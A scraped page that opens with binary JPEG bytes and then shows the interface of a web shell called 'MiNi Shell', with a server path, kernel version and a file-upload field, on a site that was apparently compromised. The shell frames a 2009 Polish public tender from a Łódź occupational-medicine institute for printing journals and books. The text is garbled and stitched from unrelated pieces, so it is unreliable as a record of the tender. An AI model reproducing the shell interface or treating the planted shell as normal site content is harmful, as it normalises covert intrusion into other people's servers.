JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090423/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090423/118332-N-2009.html

<p class="kh_header"><b>Łódź: Druk, oprawa oraz dostawa książek i czasopism dla Instytutu Medycyny Pracy w Łodzi.</b><br>
<b>Numer ogłoszenia: 118332 - 2009; data zamieszczenia: 23.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Medycyny Pracy im. prof. dra med. Jerzego Nofera , ul. Św. Teresy od Dzieciątka Jezus 8, 91-348 Łódź, woj. łódzkie, tel. 042 6314871, faks 042 6314872.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.imp.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Druk, oprawa oraz dostawa książek i czasopism dla Instytutu Medycyny Pracy w Łodzi..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
Druk, oprawa oraz dostawa książek i czasopism dla IMP w Łodzi.

Zadanie 1. Czasopisma naukowe i serie wydawnicze - druk offsetowy
1.	Kwartalnik - 4 numery w roku w nakładzie 160 egz. każdy (1 numer średnio 10 arkuszy wydawniczych, w tym około 20 tabel, 5 zdjęć czarno-białych, około 12 rysunków), format: A4, oprawa/okładka: miękka, klejona, 2+1, 2-stronna kreda matowa, 200 g; środki: 2-stronna kreda matowa 115 g.
2.	Dwumiesięcznik - 6 numerów w roku w nakładzie 500 egz. każdy (1 numer średnio 10 arkuszy wydawniczych, w tym około 20 tabel, 5 zdjęć czarno-białych, 15 wykresów), format A4, oprawa/okładka: miękka, klejona, 3+1, 2-stronna kreda matowa, 200 g; środki: 2-stronna kreda matowa 90 g.
3.	Dwurocznik - 2 numery w roku w nakładzie 300 egz. każdy (1 numer ok. 10 arkuszy wydawniczych), format A4, oprawa/okładka: miękka, klejona, 2+1, karton 240 g; środki: papier 80 g.

Zadanie 2. Książki - druk offsetowy lub cyfrowy
1.	Format A4 - oprawa/okładka: miękka, klejona, 4+0, folia błyszcząca, środki: 1+1, ok. 5 arkuszy wyd. (w tym tabele, wzory, ryciny), papier 80 g - nakład: 200 egz.,
2.	Format A5 - oprawa/okładka: miękka, klejona, 4+0, folia błyszcząca, środki: 1+1, ok. 2 arkuszy wydawniczych (w tym czarno-białe tabele, wzory, ryciny), papier 80 g - nakład: 100 egz.,
3.	Format B5 - oprawa/okładka: miękka, klejona, 4+0, folia błyszcząca, środki: 1+1, ok. 5 arkuszy wydawniczych (w tym tabele, wzory, ryciny), papier 80 g - nakład: 200 egz.
4.	Format A5 - oprawa/okładka: miękka, klejona, 4+0, folia błyszcząca, środki: 1+1, ok. 8 arkuszy wydawniczych (w tym czarno-białe tabele, wzory, ryciny), papier 80 g - nakład: 200 egz.,
5.	Format A5 - oprawa/okładka: miękka, klejona, 4+0, folia błyszcząca, środki: 1+1, ok. 5 arkuszy wydawniczych (w tym czarno-białe tabele, wzory, ryciny), papier 80 g - nakład: 200 egz.,
6.	Format A5 - oprawa/okładka: miękka, klejona, 4+0, folia matowa, środki: 1+1, ok. 3 arkuszy wydawniczych (w tym czarno-białe tabele, wzory, ryciny), papier 80 g - nakład: 300 egz.

Zadanie 3. Książki - druk offsetowy lub cyfrowy
1.	Format A4 - oprawa/okładka: miękka, klejona, 4+0, folia błyszcząca, środki: 4+4, ok. 10 arkuszy wyd. (w tym tabele, wzory, ryciny), papier 90 g - nakład: 200 egz.

Zadanie 4. Książki - druk offsetowy lub cyfrowy
1.	Format B5 - oprawa/okładka: miękka klejona, 4+0, folia błyszcząca, środki: 4+4, ok. 14 arkuszy wydawniczych (w tym tabele, wzory, ryciny), papier 80 g - nakład: 300 egz.,
2.	Format A5 - oprawa/okładka: miękka klejona, 4+0, folia błyszcząca, środki: 1+1, ok.5 arkuszy wydawniczych (w tym tabele, wzory, ryciny), 1-stronicowa pełnokolorowa wklejka na kredzie, papier 80 g - nakład: 200 egz.,
3.	Format A5 - oprawa/okładka: miękka klejona, 4+4, folia błyszcząca, środki: 1+1, ok. 4 arkuszy wydawniczych (w tym tabele, wzory, ryciny), papier 80 g - nakład: 300 egz.,
4.	Format B5 - oprawa/okładka: twarda, szyta, grzbiet zaokrąglony, 4+0, lakier miejscowy, folia matowa, wyklejka 0+0, środki: 4+4, ok. 9,75 arkusza wydawniczego (w tym tabele, wzory, ryciny), papier 80 g - nakład: 250 egz.

Nomenklatura: Wspólny Słownik Zamówień CPV - 79820000-8 Usługi związane z drukowaniem..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.82.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:

1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;

2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym  osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;

3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;

4.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia;

5.	wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanowią pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania                w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.

II. Warunki dodatkowe

1.	Wykonawca gwarantuje utrzymanie niezmienności cen za arkusz drukarski deklarowanych w Ofercie przez cały czas trwania umowy. Potwierdzi ten fakt stosownym oświadczeniem załączonym do treści składanej oferty.

2.	Wykonawca gwarantuje wystawienie, po przekazaniu całości nakładu Zamawiającemu, faktur VAT z 30-dniowym terminem płatności realizowanych przelewem.

3.	Wykonawca gwarantuje, że załączone egzemplarze okazowe zostały, w podstawowych procesach technologicznych, zrealizowane przez Wykonawcę. Potwierdzi ten fakt stosownym oświadczeniem załączonym do treści składanej oferty..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	W celu realizacji postanowień art. 22 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (DzU nr 19, poz. 177) przystępujący do postępowania o udzielenie zamówienia publicznego Wykonawca dołącza do oferty:

1.1. Koncesja, zezwolenie lub licencja jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia lub licencji na podjęcie działalności gospodarczej w zakresie objętym zamówieniem publicznym.

1.2. Aktualny odpis z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

1.3 Aktualne zaświadczenie właściwego Naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;

1.4. Umowy spółki cywilnej, jeżeli działalność gospodarcza jest prowadzona w formie spółki cywilnej z ewentualnymi aneksami wskazującymi aktualny, na dzień składania ofert, sposób reprezentowania spółki. Ponadto każdy ze wspólników spółki cywilnej zobowiązany jest dostarczyć indywidualny wypis z rejestru ewidencji działalności gospodarczej.

1.5. Wykaz wykonanych co najmniej 2 czasopism naukowych oraz 3 książek naukowych,          w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, a także załączenie dokumentów potwierdzających, że usługi te zostały wykonane należycie (minimum 3 referencje).

1.6.	Wykaz egzemplarzy okazowych dołączonych do oferty - nie mniej niż 6, nie więcej niż 10, w tym co najmniej 2 czasopisma naukowe i 3 książki naukowe
(przy czym w przypadku zadania 3 wśród wymaganych pozycji powinna się znaleźć przynajmniej jedna publikacja z tabelami i rycinami ze środkami 4+4, a w przypadku zadania 4 przynajmniej 2 w oprawie twardej, szytej i jedna ze środkami 4+4).
Egzemplarze okazowe winny być wydrukowane w takiej technologii druku, w jakim Wykonawca zamierza realizować usługę.

1.7. Wypełniony druk oferty stanowiący Załącznik 1 do SIWZ.

1.8. Oświadczenie o spełnianiu warunków udziału w postępowaniu zgodne z art. 22 i 24 ustawy Prawo zamówień publicznych stanowiące Załącznik 2 do SIWZ.

1.9. Oświadczenia, o których mowa w warunkach dodatkowych (pkt II).

1.10. Wypełnione tabele Zadanie 1, 2, 3 i 4 do niniejszej SIWZ.

	W przypadku, gdy Wykonawcę reprezentuje pełnomocnik, do oferty musi być załączone pełnomocnictwo określające jego zakres, podpisane przez osoby uprawnione do reprezentacji Wykonawcy. W przypadku złożenia kserokopii pełnomocnictwa musi być ono potwierdzone za zgodność z oryginałem przez wystawcę tego dokumentu lub w formie notarialnej, zgodnie z ustawą       z dnia 14.02.1991r. - Prawo o notariacie (Dz. U. z 2002r., Nr 42, poz. 369 z późniejszymi zmianami).

W postępowaniu o udzielenie zamówienia publicznego nie stosuje się przepisów ustawy z dnia 16 listopada 2006r. o opłacie skarbowej (Dz. U. Nr 225,   poz. 1635, zm. Dz. U. z 2007r. Nr 64, poz. 427) oraz przepisów wykonawczych wydanych na jej podstawie.
   Wykonawcy mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składają dokumenty zgodnie z przepisami rozporządzenia wykonawczego do Ustawy w sprawie rodzajów dokumentów potwierdzających spełnianie warunków udziału w postępowaniu o udzielenie zamówienia publicznego, jakich może żądać Zamawiający od Wykonawcy (rozporządzenie Prezesa Rady Ministrów z dnia 19 maja 2006r. Dz. U. Nr 188, poz. 1155)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 50</li>
<li>2 - ocena techniczna - 50</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.imp.lodz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> zampubl@imp.lodz.pl.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.05.2009 godzina 10:00, miejsce: Kancelaria Główna IMP pokój 81
ul. Św, Teresy od Dzieciątka Jezus 8,.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com